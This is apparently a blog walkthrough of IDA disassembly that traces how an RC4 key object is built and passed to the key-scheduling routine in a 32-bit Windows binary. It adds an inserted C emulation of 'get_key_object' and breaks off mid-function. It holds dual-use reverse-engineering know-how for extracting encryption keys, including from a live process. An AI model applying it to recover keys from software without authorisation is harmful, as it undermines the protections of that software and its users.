<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><br />
<pre style="font-family: 'Courier New', Courier, monospace;">
      this
      +---------------+
   00 |      ...      |                   Obj_data
      +---------------+                   +---------------+
   04 | ptr Obj_data  | ----------------> |      ...      | 00
      +---------------+                   +---------------+
   08 |     Index     |                   |      ...      | 04
      +---------------+                   +---------------+
      |      ...      |                   |      ...      | 08        Key
      +---------------+                   +---------------+           +--+
                                          | ptr byte Key  | 0C -----> |  | 0
                                          +---------------+           +--+
                                          |      ...      |           |  | 1
                                                                      +--+
                                                                      |..| 2
</pre>
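<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">As an added example (not code from the post or from the analysed binary), the C program below re-executes "get_key_object" instruction by instruction over a constructed 32-bit memory image, so the three loads and the add can be checked against the object layout above. Since the target is 32-bit, the image uses raw 4-byte loads instead of C structs; the addresses, the index value and the key bytes are made up for the example.</span><br />

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed 32-bit "process memory": a flat image whose offsets stand in
 * for virtual addresses. Layout mirrors the disassembly: this+4 holds the
 * Obj_data pointer, this+8 the Index, and Obj_data+0Ch the byte pointer to
 * the key. All addresses below are constructed values, not real ones. */
#define MEM_SIZE 0x100
static uint8_t mem[MEM_SIZE];

#define THIS_ADDR    0x10   /* the "memory buffer" object (what ecx holds) */
#define OBJDATA_ADDR 0x40   /* what [this+4] points to                     */
#define KEYBUF_ADDR  0x80   /* what [Obj_data+0Ch] points to               */

/* Hypothetical key material, constructed for the example. */
static const char SAMPLE_KEY[] = "hypothetical_key";

/* 32-bit little-endian load, like an x86 mov from memory. */
static uint32_t rd32(uint32_t addr) {
    uint32_t v;
    assert(addr + 4 <= MEM_SIZE);
    memcpy(&v, mem + addr, sizeof v);
    return v;
}

static void wr32(uint32_t addr, uint32_t v) {
    assert(addr + 4 <= MEM_SIZE);
    memcpy(mem + addr, &v, sizeof v);
}

/* Populate the image with the object graph from the diagram. */
void build_image(uint32_t index) {
    memset(mem, 0, sizeof mem);
    wr32(THIS_ADDR + 0x4, OBJDATA_ADDR);    /* 04: ptr Obj_data */
    wr32(THIS_ADDR + 0x8, index);           /* 08: Index        */
    wr32(OBJDATA_ADDR + 0xC, KEYBUF_ADDR);  /* 0C: ptr byte Key */
    memcpy(mem + KEYBUF_ADDR, SAMPLE_KEY, sizeof SAMPLE_KEY);
}

/* Emulates get_key_object step by step:
 *   mov eax, [ecx+4]    ; eax = this->Obj_data
 *   mov eax, [eax+0Ch]  ; eax = Obj_data->key
 *   add eax, [ecx+8]    ; eax += this->Index
 *   retn
 * Returns the 32-bit "address" that rc4_init receives as arg_0. */
uint32_t get_key_object(uint32_t ecx) {
    uint32_t eax = rd32(ecx + 0x4);
    eax = rd32(eax + 0xC);
    eax += rd32(ecx + 0x8);
    return eax;
}

/* The byte fetch inside rc4_init (mov bl, [esi+edi]): edi is the key
 * pointer returned above and, as assumed here, esi carries the loop
 * counter i that the post identifies with var_8. */
uint8_t key_byte(uint32_t key_ptr, uint32_t i) {
    assert(key_ptr + i < MEM_SIZE);
    return mem[key_ptr + i];
}

int main(void) {
    build_image(0);
    uint32_t key = get_key_object(THIS_ADDR);
    printf("key object at %08x: ", (unsigned)key);
    for (uint32_t i = 0; i < strlen(SAMPLE_KEY); i++)
        putchar(key_byte(key, i));
    putchar('\n');
    return 0;
}
```

With a non-zero Index the returned pointer lands inside the key buffer, which is why the index field matters when dumping the key from a live process.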
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now we have to follow <i>ecx</i> before "get_key_object" is called, and we see:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E69C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [ebp+var_20]</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So, we want to investigate when "var_20" is filled with a value.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E67F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov esi, ecx</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E681</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push [ebp+arg0]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E684</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea eax, [ebp+var_20]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E687</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ebx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">108</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E68D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E68E</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call key_from_arg0?</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">From the code above we may think that the key is passed through <i>arg0</i>, but if we try to follow <i>arg0</i> via Cross Reference we don't go very far:</span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5CE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp+var_20]</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D3</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D4</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xor ebx, ebx</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5D6</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call instantiate_object</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5DB</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov byte ptr [ebp+var_4], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">2</span></span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5DF</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5E0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ecx, esi</span></span></div>
<div style="font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5E2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call do_rc4</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><i>arg0</i> is the first parameter of the function we were in before following the Cross Reference; let's call it "do_rc4". So we have to follow <i>eax</i>, which is the return value of the "instantiate_object" function. This call takes <i>0</i> and <i>var_20</i> as its parameters and returns an empty object.</span></div>
<br />
A dead end, indeed... or maybe not! Let's reconsider the parameters passed to the "key_from_arg0?" function: maybe the parameter we are interested in isn't passed via the stack, but via a register... Maybe the missing piece is the instruction:<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E687</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ebx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">108</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span></span><br />
<br />
<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span>and we have to follow <i>esi+108h</i> instead of <i>arg0</i>!<br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">At the top of the "do_rc4" function we notice:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E67F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov esi, ecx</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">So <i>esi</i> is the "this" pointer, which "do_rc4" receives in <i>ecx</i> (the MSVC thiscall convention), and the object we are after lives at <i>this+108h</i>: it never appears on the stack at all.</span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now let's follow back the cross reference; if we scroll up the code we notice:</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push [ebp+p_key_bytes]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B5</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ebx, [ebp+arg_8]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5B8</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">108</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5BE</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5BF</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esi], offset off_10073520</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000E5C5</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call instantiate_object</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">This makes sense: there is a second call to the "instantiate_object" function, and this time its parameters are <i>p_key_bytes</i> and <i>esi+108h</i>. The natural reading is that the function builds an object from the key bytes at <i>p_key_bytes</i> and stores its address at <i>esi+108h</i>, which is exactly the slot that "do_rc4" reads later.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">So we apply the same reasoning one level up: let's call the function we are in "do_rc4_2" and follow <i>p_key_bytes</i> through its cross reference to see where it is filled in.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000129A</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [ebp+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">58</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h]</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1000129D</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call get_key_object</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A2</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A3</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lea eax, [ebp-</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1F4</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h]</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012A9</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push eax </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100012AA</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call do_rc4_2</span></span></div>
</span></div>
</span><br />
<br />
<br />
"p_key_bytes" is the second parameter of "do_rc4_2", and to find its value we have to follow <i>eax</i>, which is the return value of the "get_key_object" function we have already described: it reads an object from the address passed in <i>ecx</i>, and here <i>ecx</i> is <i>ebp+58h</i>. That is strange.<br />
Why <i>ebp+58h</i>? A positive <i>ebp</i> offset normally points at a stack parameter: are there really so many parameters on the stack?<br />
<br />
To understand the situation properly, we have to go to the beginning of the function we are in, i.e. the caller of "do_rc4_2", which starts at <i>10001230</i>:<br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001230</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> push ebp</span></span></span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001231</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> sub esp, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">48</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001234</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax, offset sub_1006A3CF</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10001239</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call __EH_prolog</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
